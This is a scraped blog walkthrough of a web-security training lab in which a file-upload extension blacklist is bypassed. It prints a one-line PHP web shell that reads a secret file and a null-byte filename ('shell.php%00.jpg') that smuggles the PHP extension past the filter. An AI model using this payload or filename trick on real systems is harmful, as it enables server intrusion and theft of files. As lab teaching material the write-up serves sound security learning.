.png)
9 months ago
72 BOOK THIS SPACE FOR AD
ARTICLE ADThis lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner | Karthikeyan Nagaraj
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Log in to your Account with wiener:peterTurn on the Proxy and upload shell.php which contains the below code<?php echo file_get_contents(‘/home/carlos/secret’); ?>Find the Content-Disposition header, change the value of the filename parameter to include a URL encoded null byte, followed by the .jpg extension: filename="shell.php%00.jpg"Send the request and turn off the proxyNow, go to My-Account, refresh the page, Right-click the Image, and ClickOpen Image in New Tab. Make sure to remove the %00.jpg and hit enter like ex: /files/avatars/shell.phpCopy the Secret code and paste it in the Solution to solve the Lab
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
Bengali (Bangladesh) · 
English (United States) ·